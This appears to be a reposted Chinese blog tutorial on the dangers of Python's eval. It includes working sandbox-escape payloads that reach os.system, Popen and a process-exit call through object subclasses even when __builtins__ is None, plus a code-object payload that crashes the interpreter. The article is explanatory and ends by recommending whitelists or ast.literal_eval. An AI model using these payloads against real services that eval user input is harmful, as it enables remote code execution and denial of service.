python什么情况下要加eval_python 为什么说eval要慎用?使用eval 带来的潜在风险?什么情况下使用eval?...
搜索热词
eval前言
In [1]: eval("2+3")
Out[1]: 5
In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
当内存中的内置模块含有os的话,eval同样可以做到命令执行:
In [3]: import os
In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0
当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:
In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0
在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。
安全”使用eval
现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:
Eval函数的声明为eval(expression[,globals[,locals]])
其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。
>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
File "", line 1, in
File "", in
NameError: name 'os' is not defined
如果指定只允许调用abs函数,可以使用下面的写法:
>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs})
Traceback (most recent call last):
File "", in
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!
绕过执行代码1
被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:
env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
eval(users_str, env)
Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:
>>> __builtins__.abs(-20)
20
>>> abs(-20)
20
我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:
>>> def hello():
... print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi
小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:
>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136
根据乌云drops提到的方法,使用如下代码即可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:
>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0
和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:
from setuptools import setup, find_packages
python setup.py bdist_egg
就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:
>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0
拒绝服务攻击1
object的子类中有很多有趣的东西,执行以下代码查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
== 'Quitter'][0](0)()", {'__builtins__':None})
C:/>
如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,例子如下:
>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
>>>
正在 Ping 127.0.0.1 具有 32 字节的数据:
来自 127.0.0.1 的回复: 字节=32 时间>>
事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。
拒绝服务攻击2
同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,"KABOOM",(),"",""),{})())()', {"__builtins__":None})
运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。
总结
从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。
参考资料:
【1】http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html
【2】http://drops.wooyun.org/web/7490
【3】
http://stackoverflow.com/questions/3513292/python-make-eval-saf
相关文章
总结
如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您喜欢交流学习经验,点击链接加入交流1群:1065694478(已满)交流2群:163560250
python什么情况下要加eval_python 为什么说eval要慎用?使用eval 带来的潜在风险?什么情况下使用eval?...相关推荐
- java滚动条下拉_[Java教程]相对漂亮的滚动条slimscroll可以实现下拉加载
[Java教程]相对漂亮的滚动条slimscroll可以实现下拉加载 0 2016-03-23 16:00:05 在之前的开发中遇到过下拉加载想要漂亮点的滚动条,但是最初引入的mCustomScrol ...
- SpringBootTest单元测试—加入@Test无法启动测试方法,什么情况下需要加@RunWith(SpringRunner.class)?
spring环境下单元测试: SpringBoot环境下单元测试: 一.SpringBoot2.4.0之后 二.2.2.0 < SpringBoot < 2.4. 三.SpringBoot ...
- 安装fitz报错_解决python 虚拟环境删除包无法加载的问题
项目开发一直在docker的虚拟环境上,遇到了一个问题,就是把虚拟环境的包删掉(rm -rf xxx)之后,再重新拷贝一个(跟原来包一模一样的文件夹)进去发现pycharm再也找不到这个包了,后来在同 ...
- python代码学习-数据处理图片加遮挡、噪声、模糊
python代码学习-数据处理图片加遮挡.噪声.模糊 (一)python代码学习-数据处理图片加遮挡 代码: from matplotlib import pyplot as plt from PIL ...
- 上拉刷新下拉加载PullToRefreshLayout
2019独角兽企业重金招聘Python工程师标准>>> java pullable代码 package com.example.lsy.tianmi.base.commonview; ...
- linux path环境变量检索目录,Linux下动态链接库加载路径及搜索路径问题
引子 近日,服务器迁移后,偷懒未重新编译nginx的,直接./nginx启动,结果遇到如下问题: "error while loading shared libraries" 这是 ...
- windows下多进程加协程并发模式
好久没更新博客了.正好最近要整理一下最近这段时间做过的项目以及学习python的一些心得.如标题所示,今天就来说说windows下多进程加协程并发模式.其实网上还是蛮多在linux下的多进程加协程并发 ...
- iscroll5 上拉,下拉 加载数据
我这里的思路是上拉时候只是加载第一页的内容,可根据实际情况修改其中的代码.请勿照搬.样式没怎么调,可以加载gif动画.1.没有数据时候,下拉可以加载数据.2.没有数据时候,点击也可以加载数据.3.其余 ...
- 下拉加载更多--判断页面距离
2019独角兽企业重金招聘Python工程师标准>>> /* *下拉加载更多使用 *底部小于50返回false--加载,否则不加载 * */ function lowEnough() ...
- Android应用开发提高系列(5)——Android动态加载(下)——加载已安装APK中的类和资源...
前言 Android动态加载(下)--加载已安装APK中的类和资源. 声明 欢迎转载,但请保留文章原始出处:) 博客园:http://www.cnblogs.com 农民伯伯: http://ov ...
最新文章
- 小程序一次性上传多个本地图片,上拉加载照片以及图片加载延迟解决之道
- python gevent 协程
- pg-xl 基于 pgxc_ctl 安装与使用
- ES6--基础语法(一)
- python笔记之面向对象
- 怎么样尽可能多的学习
- Interfacing to kdb+ from Java
- SAP CRM中间件队列CSAPR_HIERR3PRODHIER
- Maven精选系列--三种仓库详解
- 电信计算机知识考试,2020中国电信考试试题——专业知识一
- ipv4广播地址怎么填_什么是IP地址?IP地址有什么用?网络工程师来告诉你
- “我的国产数据库之路”征文活动——专访优秀作者彭冲
- word2vec原理CBOW与Skip-Gram模型基础
- 记事本写小程序C语言,抖音上用记事本编写爱心小程序教程
- 聚焦技术实战!MDCC 2016 移动开发者大会盛大开幕
- 【已经解决】网页按F12转开发者模式,看不到请求头Headers信息
- 自编一个从指定位置开始查找字符串的Python代码
- 无线耳机除了苹果哪个牌子好?类似苹果耳机的蓝牙耳机推荐
- 介绍大家一个很好玩的网站。多人在线flash联机游戏。
- python怎么做表格_零基础小白怎么用Python做表格?
热门文章
- java中的example_GitHub - lilei644/spring-java-example: 记录开发以及学习过程中Spring、Java相关的示例...
- 北京胜新疆夺CBA总冠军 苏群:广东依旧实力最强
- 【自学Flutter】3.2 图片的填充样式
- Android中控件设置英文文本内容时区分大小写
- 使用高德地图获取拍照图片地理位置
- Linux下恢复误删的文件
- bpmn文件转换为png格式图片
- 信息科学技术与创新之“知识升华”
- Greenplum Python工具库gpload学习——gpload类
- [kernel]linux内核基础: 版本、源码、编译与调试